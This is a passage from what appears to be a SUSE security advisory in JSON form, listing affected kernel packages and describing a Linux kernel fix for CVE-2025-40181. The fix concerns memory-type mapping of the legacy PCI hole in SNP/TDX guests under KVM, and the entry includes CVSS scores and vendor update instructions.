"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40177"
},
{
"cve": "CVE-2025-40181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/kvm: Force legacy PCI hole to UC when overriding MTRRs for TDX/SNP\n\nWhen running as an SNP or TDX guest under KVM, force the legacy PCI hole,\ni.e. memory between Top of Lower Usable DRAM and 4GiB, to be mapped as UC\nvia a forced variable MTRR range.\n\nIn most KVM-based setups, legacy devices such as the HPET and TPM are\nenumerated via ACPI. ACPI enumeration includes a Memory32Fixed entry, and\noptionally a SystemMemory descriptor for an OperationRegion, e.g. if the\ndevice needs to be accessed via a Control Method.\n\nIf a SystemMemory entry is present, then the kernel\u0027s ACPI driver will\nauto-ioremap the region so that it can be accessed at will. However, the\nACPI spec doesn\u0027t provide a way to enumerate the memory type of\nSystemMemory regions, i.e. there\u0027s no way to tell software that a region\nmust be mapped as UC vs. WB, etc. As a result, Linux\u0027s ACPI driver always\nmaps SystemMemory regions using ioremap_cache(), i.e. as WB on x86.\n\nThe dedicated device drivers however, e.g. the HPET driver and TPM driver,\nwant to map their associated memory as UC or WC, as accessing PCI devices\nusing WB is unsupported.\n\nOn bare metal and non-CoCO, the conflicting requirements \"work\" as firmware\nconfigures the PCI hole (and other device memory) to be UC in the MTRRs.\nSo even though the ACPI mappings request WB, they are forced to UC- in the\nkernel\u0027s tracking due to the kernel properly handling the MTRR overrides,\nand thus are compatible with the drivers\u0027 requested WC/UC-.\n\nWith force WB MTRRs on SNP and TDX guests, the ACPI mappings get their\nrequested WB if the ACPI mappings are established before the dedicated\ndriver code attempts to initialize the device. E.g. if acpi_init()\nruns before the corresponding device driver is probed, ACPI\u0027s WB mapping\nwill \"win\", and result in the driver\u0027s ioremap() failing because the\nexisting WB mapping isn\u0027t compatible with the requested WC/UC-.\n\nE.g. when a TPM is emulated by the hypervisor (ignoring the security\nimplications of relying on what is allegedly an untrusted entity to store\nmeasurements), the TPM driver will request UC and fail:\n\n [ 1.730459] ioremap error for 0xfed40000-0xfed45000, requested 0x2, got 0x0\n [ 1.732780] tpm_tis MSFT0101:00: probe with driver tpm_tis failed with error -12\n\nNote, the \u00270x2\u0027 and \u00270x0\u0027 values refer to \"enum page_cache_mode\", not x86\u0027s\nmemtypes (which frustratingly are an almost pure inversion; 2 == WB, 0 == UC).\nE.g. tracing mapping requests for TPM TIS yields:\n\n Mapping TPM TIS with req_type = 0\n WARNING: CPU: 22 PID: 1 at arch/x86/mm/pat/memtype.c:530 memtype_reserve+0x2ab/0x460\n Modules linked in:\n CPU: 22 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.16.0-rc7+ #2 VOLUNTARY\n Tainted: [W]=WARN\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/29/2025\n RIP: 0010:memtype_reserve+0x2ab/0x460\n __ioremap_caller+0x16d/0x3d0\n ioremap_cache+0x17/0x30\n x86_acpi_os_ioremap+0xe/0x20\n acpi_os_map_iomem+0x1f3/0x240\n acpi_os_map_memory+0xe/0x20\n acpi_ex_system_memory_space_handler+0x273/0x440\n acpi_ev_address_space_dispatch+0x176/0x4c0\n acpi_ex_access_region+0x2ad/0x530\n acpi_ex_field_datum_io+0xa2/0x4f0\n acpi_ex_extract_from_field+0x296/0x3e0\n acpi_ex_read_data_from_field+0xd1/0x460\n acpi_ex_resolve_node_to_value+0x2ee/0x530\n acpi_ex_resolve_to_value+0x1f2/0x540\n acpi_ds_evaluate_name_path+0x11b/0x190\n acpi_ds_exec_end_op+0x456/0x960\n acpi_ps_parse_loop+0x27a/0xa50\n acpi_ps_parse_aml+0x226/0x600\n acpi_ps_execute_method+0x172/0x3e0\n acpi_ns_evaluate+0x175/0x5f0\n acpi_evaluate_object+0x213/0x490\n acpi_evaluate_integer+0x6d/0x140\n acpi_bus_get_status+0x93/0x150\n acpi_add_single_object+0x43a/0x7c0\n acpi_bus_check_add+0x149/0x3a0\n acpi_bus_check_add_1+0x16/0x30\n acpi_ns_walk_namespace+0x22c/0x360\n acpi_walk_namespace+0x15c/0x170\n acpi_bus_scan+0x1dd/0x200\n acpi_scan_init+0xe5/0x2b0\n acpi_init+0x264/0x5b0\n do_one_i\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40181",
"url": "https://www.suse.com/security/cve/CVE-2025-40181"
},
{
"category": "external",
"summary": "SUSE Bug 1253471 for CVE-2025-40181",
"url": "https://bugzilla.suse.com/1253471"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
